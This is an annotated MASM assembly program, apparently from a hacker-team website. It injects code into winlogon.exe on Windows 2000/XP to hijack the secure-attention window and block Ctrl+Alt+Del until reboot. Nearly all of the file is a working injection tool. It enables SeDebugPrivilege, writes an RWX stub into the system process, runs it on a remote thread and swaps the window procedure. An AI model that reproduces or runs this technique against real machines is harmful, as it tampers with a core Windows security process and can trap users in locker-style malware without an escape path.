;在window2k&XP下屏蔽Ctrl+Alt+del
;by 来自轻院的狼[immlep]
;www.ptteam.com
;http://immlep.blogone.net
;注射代码到winlogon.exe,接管SAS消息处理函数,屏蔽Ctrl+Alt+del
;注:本注射的代码中还没有实现卸载的方法,运行本程序后.Ctrl+Alt+del将会一直被屏蔽,除非重启或自己卸载代码.
;(EN) Injects a stub into winlogon.exe that replaces the SAS window procedure and swallows the Ctrl+Alt+Del hotkey.
;(EN) Caution: there is no unload path. Once run, Ctrl+Alt+Del stays blocked until reboot or until the hook is removed by hand.
;(EN) Needs a token on which SeDebugPrivilege can be enabled (see _EnableDebugPrivilege); the stub executes inside winlogon.exe with no error handling, so try it on a throwaway VM only.
.386
.model flat,stdcall
option casemap :none
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
includelib kernel32.lib
includelib user32.lib
includelib advapi32.lib
NewSASProc PROTO :HWND,:UINT,:WPARAM,:LPARAM
; szText Name, Text...
; Defines a NUL-terminated string inline in the code stream and jumps
; over it, so a procedure can carry its own literal without a .data
; symbol. Each expansion costs one jmp at run time. Used for the
; privilege name in _EnableDebugPrivilege.
szText MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl                                 ; step over the string bytes that follow
Name db Text,0                          ; the literal, NUL-terminated
lbl:
ENDM
.data
hProcess dd 0                           ; BOOL from Process32First/Next (loop guard in Start), not a handle
hSnapshot dd 0                          ; Toolhelp snapshot handle
ph dd 0                                 ; process handle for winlogon.exe from OpenProcess
szUserBase dd 0                         ; HMODULE of user32.dll (not a string despite the sz prefix)
injection_base dd 0                     ; address of the copied stub inside winlogon.exe
dwSize dd 0                             ; not referenced anywhere in this listing
szkernel32 db 'kernel32.dll',0          ; module names for LoadLibrary
szuser32 db 'user32.dll',0
szSetWindowLong db 'SetWindowLongA',0   ; export names for GetProcAddress
szFindWindow db 'FindWindowA',0
szCallWindowProc db 'CallWindowProcA',0
szExitThread db 'ExitThread',0
szWinlogon db 'winlogon.exe',0          ; target image name compared against PROCESSENTRY32.szExeFile
uProcess PROCESSENTRY32 <0>             ; Toolhelp walk buffer; dwSize is filled in by Start
szfname db 0 dup(30h)                   ; 0 dup(...) reserves nothing; unused
.code
;-----------------------------------------------------------------------
; _injection — position-independent stub that Start copies into
; winlogon.exe and runs there on a remote thread. In C terms:
;   hwnd = FindWindowA("SAS Window class", "SAS window");
;   OldSASPro = SetWindowLongA(hwnd, GWL_WNDPROC, NewSASProc);
;   ExitThread(0);
; Everything from here up to injection_size is copied verbatim, so no
; absolute address may be embedded: API entry points are patched by
; Start into the dd slot after each 0B8h byte (0B8h imm32 encodes
; mov eax,imm32 — it is written as data so the slot has a label), and
; every other address is derived from the return address of a call to
; the very next instruction. String arguments use the same trick: a
; call that lands just past the string leaves the string's address on
; the stack as the pushed "return address".
; Nothing is checked: a NULL from FindWindow is handed straight to
; SetWindowLong, and whatever SetWindowLong returns (previous procedure,
; or 0 on failure) is stored in OldSASPro.
;-----------------------------------------------------------------------
_injection:
call @F                                 ; pushes &szwindowtext (lpWindowName, 2nd arg)
szwindowtext db 'SAS window',0
@@:
call @F                                 ; pushes &szclass (lpClassName, 1st arg)
szclass db 'SAS Window class',0
@@:
db 0B8h                                 ; mov eax,imm32 — imm32 patched by Start
_FindWindow dd 0
call eax                                ; eax = FindWindowA(szclass, szwindowtext)
call Local1                             ; pushes remote address of Local1
Local1:
add dword ptr[esp],offset LocalX-offset Local1 ; [esp] = remote address of NewSASProc (dwNewLong)
push GWL_WNDPROC
push eax                                ; hwnd from FindWindow
db 0B8h                                 ; mov eax,imm32 — imm32 patched by Start
_SetWindowLong dd 0                     ; swap the window procedure so our code takes over
call eax                                ; eax = previous procedure (0 on failure)
push eax
call @F                                 ; pushes remote address of OldSASPro
OldSASPro dd 0                          ; original SAS window procedure, filled in at run time
@@:
pop eax
pop [eax]                               ; OldSASPro = previous procedure
push 0
db 0b8h                                 ; mov eax,imm32 — imm32 patched by Start
_ExitThread dd 0
call eax                                ; ExitThread(0): hook installed, this thread is done
LocalX:
;-------------------------
;新的窗口处理函数
;-------------------------
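;-----------------------------------------------------------------------
; NewSASProc — replacement window procedure for winlogon's SAS window.
;   LRESULT CALLBACK NewSASProc(HWND hWin, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Runs inside winlogon.exe at whatever address the stub was copied to,
; so it must stay position-independent: OldSASPro is located relative
; to the return address of a call to the next instruction, and
; CallWindowProcA is reached through the imm32 slot Start patches.
; Behaviour: the WM_HOTKEY for Ctrl+Alt+Del is swallowed (returns 0);
; every other message, including any other WM_HOTKEY, is forwarded to
; the original procedure. The earlier version forwarded only
; non-WM_HOTKEY messages and returned uMsg for every other hotkey.
; Out: eax = 0 for the blocked hotkey, otherwise the original
;      procedure's result.
;-----------------------------------------------------------------------
NewSASProc proc hWin:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
    ; WM_HOTKEY lParam: high word = virtual key, low word = modifier mask.
    ; 02Eh = VK_DELETE; 3 = MOD_CONTROL or MOD_ALT.
    CAD_HOTKEY_LPARAM equ 02E0003h
    mov eax,uMsg
    .if eax==WM_HOTKEY && lParam==CAD_HOTKEY_LPARAM
        xor eax,eax                     ; swallow Ctrl+Alt+Del
    .else
        ; CallWindowProcA(OldSASPro, hWin, uMsg, wParam, lParam)
        push lParam
        push wParam
        push uMsg
        push hWin
        call ret_here                   ; pushes the remote address of ret_here
ret_here:
        pop eax
        ; The distance from ret_here back to OldSASPro is identical in the
        ; copied stub and in this image, so let the assembler compute it;
        ; the former hard-coded 03Eh broke whenever the code above changed.
        sub eax,offset ret_here-offset OldSASPro
        push dword ptr [eax]            ; lpPrevWndFunc = OldSASPro
        db 0B8h                         ; mov eax,imm32 — imm32 patched by Start
_CallWindowProc dd 0
        call eax
    .endif
    ret
NewSASProc endp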
injection_size equ $-_injection
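;-----------------------------------------------------------------------
; Start — injector entry point (runs in this process, not in winlogon).
; 1. Resolve ExitThread / SetWindowLongA / FindWindowA / CallWindowProcA
;    and write them into the stub's mov eax,imm32 slots. Those labels
;    live in .code, which is why the code section must be linked
;    writable. Assumes kernel32/user32 sit at the same base inside
;    winlogon.exe, otherwise the patched addresses are meaningless there.
; 2. Enable SeDebugPrivilege, locate winlogon.exe via Toolhelp, open it.
; 3. Copy [_injection, _injection+injection_size) into RWX memory in
;    winlogon and execute it on a remote thread.
; Differences from the earlier version: the process-name compare tests
; the return value instead of the flags left behind by the call; a
; missing winlogon.exe, a failed snapshot, OpenProcess, VirtualAllocEx
; or WriteProcessMemory no longer feeds 0 into the next call; OpenProcess
; requests only the rights the remote-thread write/launch needs; the
; remote thread handle is closed; the name match is case-insensitive.
;-----------------------------------------------------------------------
Start:
    invoke LoadLibrary,addr szkernel32
    invoke GetProcAddress,eax,addr szExitThread
    mov _ExitThread,eax
    invoke LoadLibrary,addr szuser32
    mov szUserBase,eax                  ; HMODULE of user32 despite the sz prefix
    invoke GetProcAddress,szUserBase,addr szSetWindowLong
    mov _SetWindowLong,eax
    invoke GetProcAddress,szUserBase,addr szFindWindow
    mov _FindWindow,eax
    invoke GetProcAddress,szUserBase,addr szCallWindowProc
    mov _CallWindowProc,eax

    call _EnableDebugPrivilege          ; result not needed: OpenProcess below is the real check

    invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
    .if eax==INVALID_HANDLE_VALUE
        jmp done
    .endif
    mov hSnapshot,eax
    mov uProcess.dwSize,sizeof uProcess
    invoke Process32First,hSnapshot,addr uProcess
    mov hProcess,eax                    ; BOOL "entry valid", not a handle
    .while hProcess!=0
        invoke lstrcmpi,addr szWinlogon,addr uProcess.szExeFile
        test eax,eax                    ; flags after a call are undefined; test the result
        jz found
        invoke Process32Next,hSnapshot,addr uProcess
        mov hProcess,eax
    .endw
    jmp snapshot_done                   ; winlogon.exe not found: ph stays 0
found:
    ; Least privilege: exactly what WriteProcessMemory/VirtualAllocEx/
    ; CreateRemoteThread need, instead of PROCESS_ALL_ACCESS.
    invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_QUERY_INFORMATION or PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ,FALSE,uProcess.th32ProcessID
    mov ph,eax
snapshot_done:
    invoke CloseHandle,hSnapshot
    .if ph==0
        jmp done                        ; not found, or no SeDebugPrivilege / not admin
    .endif
    invoke VirtualAllocEx,ph,NULL,injection_size,MEM_COMMIT,PAGE_EXECUTE_READWRITE
    mov injection_base,eax
    .if eax!=0
        invoke WriteProcessMemory,ph,injection_base,addr _injection,injection_size,NULL
        .if eax!=0
            invoke CreateRemoteThread,ph,NULL,0,injection_base,NULL,0,0
            .if eax!=0
                invoke CloseHandle,eax  ; thread handle; previously leaked
            .endif
        .endif
    .endif
    invoke CloseHandle,ph
done:
    invoke ExitProcess,NULL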
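;-----------------------------------------------------------------------
; _EnableDebugPrivilege — enable SeDebugPrivilege on this process token
; so OpenProcess on winlogon.exe can succeed.
; Out: eax != 0 if the privilege is now enabled, 0 otherwise.
;      AdjustTokenPrivileges reports success even when the privilege is
;      not held by the token; only GetLastError()==ERROR_NOT_ALL_ASSIGNED
;      reveals that, so it is checked here (the earlier version returned
;      the raw BOOL and reported success in that case).
; Clobbers: eax, ecx, edx, flags.
;-----------------------------------------------------------------------
_EnableDebugPrivilege proc
    local @hToken:DWORD
    local @tp:TOKEN_PRIVILEGES
    local @ok:DWORD
    NOT_ALL_ASSIGNED = 1300             ; ERROR_NOT_ALL_ASSIGNED
    szText SE_DEBUG_NAME_Y,"SeDebugPrivilege"
    mov @ok,0
    invoke GetCurrentProcess
    lea ecx,@hToken                     ; lea ecx rather than addr: addr on a local goes through eax
    ; Least privilege: adjusting (and querying) is all this handle is used for.
    invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,ecx
    .if eax==0
        jmp no_token
    .endif
    mov @tp.PrivilegeCount,1
    mov @tp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
    invoke LookupPrivilegeValue,NULL,addr SE_DEBUG_NAME_Y,addr @tp.Privileges[0].Luid
    .if eax!=0
        invoke AdjustTokenPrivileges,@hToken,FALSE,addr @tp,sizeof @tp,NULL,NULL
        .if eax!=0
            invoke GetLastError
            .if eax!=NOT_ALL_ASSIGNED
                mov @ok,1
            .endif
        .endif
    .endif
    invoke CloseHandle,@hToken
no_token:
    mov eax,@ok
    ret
_EnableDebugPrivilege endp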
end Start
编译链接时要将代码段设为可写
(EN) Link with a writable code section (e.g. link.exe /SECTION:.text,RWE): Start writes the resolved API addresses into _ExitThread, _SetWindowLong, _FindWindow and _CallWindowProc, which are dd slots placed inside .code; without a writable .text those stores fault. Note this line sits after "end Start" and is ignored by the assembler.